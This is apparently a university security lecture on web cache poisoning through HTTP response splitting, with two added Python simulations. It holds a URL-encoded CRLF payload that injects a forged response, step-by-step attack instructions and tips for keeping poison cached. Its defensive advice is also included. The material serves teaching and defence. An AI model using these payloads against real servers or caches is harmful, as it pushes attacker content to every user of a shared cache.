Cache poisoning

Introduction presentation about web cache poisoning attacks

  • When was it discovered, and by whom

    1. Cache Poisoning. FCS Iasi, Software Security
    2. Overview: intro; web cache poisoning; related attacks; about HTTP response splitting; attack scenario; practical considerations. Software Security, FCS Iasi, 2013-2014
    3. About web cache poisoning. A domain pioneered by Amit Klein, formerly Director of Security and Research at Sanctum, Inc. The attack lets an attacker place malicious content on a shared cache server (such as a proxy server); all users of that cache then keep receiving the malicious content until the cache entry is purged.
    4. Related attacks and vulnerabilities. The web cache poisoning attack described here is built on HTTP response splitting: the attacker must find a web resource vulnerable to HTTP response splitting and exploit that vulnerability. Cross-user defacement is also possible: the injected response is delivered to one specific user instead of the cache, which can be used to place malicious web content in front of that user and to steal sensitive information.
    5. HTTP response splitting. Forcing an originator of HTTP messages (typically a web server) to emit two (or more) valid, RFC-compliant messages instead of one. It is the result of the application's failure to reject illegal user input: unexpected CR and LF characters that end up inside response headers, most often Location and Set-Cookie, because those headers commonly echo user-controlled data.
    6. Response splitting example [5]
       JSP page (say): <% response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang")); %>
       Normal request:
       Normal response:
       HTTP/1.0 302 Redirect
       Location:
       Connection: Keep-Alive
       Content-Length: 0
    7. Example, continued [5]
       Attack request (the lang value closes the real response with an empty body and appends a second, complete response):
       %200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>
       Response (actually, 2 responses and some change):
       HTTP/1.0 302 Redirect
       Location:
       Connection: Keep-Alive
       Content-Length: 0
       [interpreted as Response #1]
       HTTP/1.0 200 OK
       Content-Type: text/html
       Content-Length: 20
       <html>Gotcha!</html>
       [interpreted as Response #2, injected by the attacker]
       Connection: Keep-Alive
       Content-Length: 0
       …
       [superfluous data, does not conform to the HTTP standard]
    8. Cache poisoning attack. Difficult to carry out in a real environment (many conditions and prerequisites):
       1) Find a web resource vulnerable to HTTP response splitting.
       2) Force the cache server to flush its current copy of the target resource (Pragma: no-cache or Cache-Control headers), so that the next request for it goes to the origin.
       3) Send a specially crafted request, as on the previous slides.
       4) Immediately send the next request, for the resource to be poisoned. The cache pairs responses with requests by order on the shared connection, so the injected Response #2 (produced by the request in step 3) is taken as the response to the request in step 4 and is stored by the shared web cache under that resource's URL.
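The four steps above, worked through as an added example that is not part of the original slides: a toy origin that serves the slide's vulnerable redirect, a response parser that reads pipelined responses off one keep-alive connection the way a proxy does, and a shared cache that pairs responses with requests purely by order. The paths /by_lang.jsp and /index.html, the "Gotcha!" and "Welcome" bodies and the attack string are constructed for the example (the lang value is the slide's payload with a "Content-Length: 0" line in front, which is what closes the real 302). The hardened redirect beside the vulnerable one is the developer advice from slide 10, not code from the slides.

```python
"""Web cache poisoning via HTTP response splitting, simulated end to end (added example)."""
from urllib.parse import parse_qs, quote

# Constructed attack value for the `lang` parameter. URL-decoded it ends the genuine 302
# early (Content-Length: 0) and appends a complete second response whose body is exactly
# 20 bytes, so a proxy that trusts Content-Length reads it as a separate message.
ATTACK_QUERY = (
    "lang=en%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>"
)


def http_response(status, headers, body):
    """Serialise one HTTP/1.0 response; header values are written verbatim (no escaping)."""
    head = f"HTTP/1.0 {status}\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers) + "\r\n"
    return head.encode("latin-1") + body


def vulnerable_redirect(lang):
    # Mirrors the slide's JSP: sendRedirect("/by_lang.jsp?lang=" + lang), no CR/LF filtering.
    return http_response("302 Redirect", [("Location", "/by_lang.jsp?lang=" + lang),
                                          ("Connection", "Keep-Alive"), ("Content-Length", "0")], b"")


def safe_redirect(lang):
    # Hardened form: refuse any control character (CR, LF, NUL, ...) outright, then
    # percent-encode the value so the Location header can only ever occupy one line.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in lang):
        raise ValueError("control character in redirect parameter")
    return http_response("302 Redirect", [("Location", "/by_lang.jsp?lang=" + quote(lang, safe="")),
                                          ("Connection", "Keep-Alive"), ("Content-Length", "0")], b"")


def origin(request_target, redirect=vulnerable_redirect):
    """Toy origin server: /by_lang.jsp redirects, anything else is a static 20-byte page."""
    path, _, query = request_target.partition("?")
    if path == "/by_lang.jsp":
        lang = parse_qs(query).get("lang", [""])[0]   # the container URL-decodes %0d%0a for us
        return redirect(lang)
    body = b"<html>Welcome</html>"
    return http_response("200 OK", [("Content-Type", "text/html"),
                                    ("Content-Length", str(len(body)))], body)


def split_responses(wire):
    """Parse consecutive responses off one connection as a proxy would: status line, headers,
    then exactly Content-Length body bytes. Stops at the first thing that is not a status line
    and returns (responses, leftover) so the superfluous bytes of the slide are visible."""
    responses = []
    while True:
        head, sep, rest = wire.partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        if not sep or not lines[0].startswith(b"HTTP/"):
            return responses, wire
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
        length = int(headers.get("content-length", "0"))
        responses.append({"status": lines[0].decode("latin-1"), "headers": headers, "body": rest[:length]})
        wire = rest[length:]


def shared_cache_proxy(targets, origin_fn=origin):
    """Pipeline `targets` over one keep-alive origin connection, pair responses with requests
    by order only, and cache every 200 under the URL it was paired with (the poisoning step)."""
    wire = b"".join(origin_fn(t) for t in targets)     # all responses arrive on one TCP stream
    responses, _leftover = split_responses(wire)        # leftover = "some change" on the slide
    cache = {}
    for target, resp in zip(targets, responses):
        if resp["status"].split()[1] == "200":
            cache[target] = resp
    return cache


if __name__ == "__main__":
    # Steps 3 and 4 of the slide: crafted request immediately followed by the target URL.
    poisoned = shared_cache_proxy(["/by_lang.jsp?" + ATTACK_QUERY, "/index.html"])
    print(poisoned["/index.html"]["body"])             # what every later client now receives
```

Note that the genuine response to /index.html is still on the wire behind the superfluous bytes; the parser simply never reaches it, which is the same reason the slides say the exact point where the second message starts depends on the server and proxy implementation.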
    9. Attacker, practical aspects [4]
       Keep the poisoned resource in the cache: give it a Last-Modified header with a date in the future, so that when the cache revalidates with If-Modified-Since the origin answers 304 Not Modified and the poisoned copy is kept. Alternatively, repeat the cache poisoning attack every x minutes?
       Execute all requests immediately one after another, so that the crafted request and the request for the target resource are paired on the same connection.
       Take the URI length into account (GET vs. POST).
       The attack scenario depends on the web server implementation (Microsoft ASP, Jakarta Tomcat, IBM WebSphere etc.): where does the second message start?
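Why the slide recommends a future Last-Modified value, as an added simulation that is not part of the original slides: a shared cache stores the poisoned page, lets it go stale, and revalidates with If-Modified-Since carrying the attacker-chosen date. The page bodies, timestamps and the ten-minute freshness window are constructed; origin_get's naive comparison (304 whenever the client's date is not older than the real modification time) is the behaviour the trick relies on, and the ignore_future_ims switch models origins that refuse to honour a date later than the request time.

```python
"""Cache revalidation and the future Last-Modified trick, simulated (added example)."""
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

# Constructed fixture: the genuine and poisoned /index.html and a timeline.
GENUINE_BODY = b"<html>Welcome</html>"
POISON_BODY = b"<html>Gotcha!</html>"
GENUINE_MTIME = datetime(2014, 1, 10, tzinfo=timezone.utc)   # real mtime of the page on the origin
T0 = datetime(2014, 2, 1, 12, 0, tzinfo=timezone.utc)         # moment the cache is poisoned
UPDATED_MTIME = T0 + timedelta(minutes=5)                     # site owner republishes the page later
LONG_AGO = datetime(2013, 1, 1, tzinfo=timezone.utc)
FAR_FUTURE = T0 + timedelta(days=3650)
MAX_AGE = timedelta(minutes=10)                               # freshness the cache grants an entry


def http_date(dt):
    """HTTP-date as used in Last-Modified / If-Modified-Since."""
    return format_datetime(dt, usegmt=True)


def origin_get(if_modified_since, now, mtime, ignore_future_ims=False):
    """Origin's conditional GET for the page; returns (status, headers, body).
    Naive rule: 304 whenever the client's date is not older than the real mtime.
    ignore_future_ims models origins that disregard a date later than the request time."""
    if if_modified_since is not None:
        ims = parsedate_to_datetime(if_modified_since)
        if ims >= mtime and not (ignore_future_ims and ims > now):
            return 304, {}, b""
    return 200, {"Last-Modified": http_date(mtime)}, GENUINE_BODY


class SharedCache:
    def __init__(self, origin_mtime=GENUINE_MTIME, ignore_future_ims=False):
        self.entries = {}
        self.origin_mtime = origin_mtime
        self.ignore_future_ims = ignore_future_ims

    def store(self, url, body, last_modified, now):
        self.entries[url] = {"body": body, "last_modified": last_modified,
                             "fresh_until": now + MAX_AGE}

    def get(self, url, now):
        entry = self.entries[url]
        if now < entry["fresh_until"]:
            return entry["body"]                              # still fresh: served from cache
        # Stale: revalidate using the Last-Modified value the attacker put in the entry.
        status, headers, body = origin_get(entry["last_modified"], now,
                                           self.origin_mtime, self.ignore_future_ims)
        if status == 304:                                     # origin vouched for the cached copy
            entry["fresh_until"] = now + MAX_AGE
            return entry["body"]
        self.store(url, body, headers["Last-Modified"], now)  # replaced by the genuine page
        return body


def body_after_expiry(poison_last_modified, origin_mtime=GENUINE_MTIME, ignore_future_ims=False):
    """Poison /index.html at T0 with the given Last-Modified date, let the entry go stale,
    and return what the cache serves to the next client."""
    cache = SharedCache(origin_mtime, ignore_future_ims)
    cache.store("/index.html", POISON_BODY, http_date(poison_last_modified), T0)
    return cache.get("/index.html", T0 + MAX_AGE + timedelta(seconds=1))


if __name__ == "__main__":
    print(body_after_expiry(LONG_AGO))                                # genuine page wins
    print(body_after_expiry(FAR_FUTURE, origin_mtime=UPDATED_MTIME))  # poison survives a republish
```

Against the naive origin a future date keeps the poison through every revalidation, even after the real page is republished, until the entry is purged; a date that is merely "now" loses as soon as the page changes. Against an origin that ignores future If-Modified-Since dates (Apache httpd's conditional-request handling, for one) the first revalidation restores the genuine page, which is why the slide also considers re-sending the attack every x minutes.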
    10. Victims, practical aspects [4]
       Web application developers: VALIDATE INPUT! Remove CRs and LFs before embedding data in HTTP response headers (Location and Set-Cookie especially).
       Web application engine vendors: disallow CR and LF characters in all HTTP response header values (already a requirement of RFC 2616).
       Proxy vendors: avoid sharing a server TCP connection among different clients / virtual hosts.
    11. Bibliography
       1) OWASP page for Web cache poisoning
       2) OWASP page for HTTP Response Splitting
       3) OWASP Testing Guide v3 (section 4.8.15, Testing for HTTP Splitting/Smuggling, pages 278-281)
       4) Amit Klein, "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics", Sanctum, 2004
       5) Amit Klein, "HTTP Message Splitting, Smuggling and Other Animals", OWASP AppSec Europe, 2006
       6) "China's Great Firewall spreads overseas"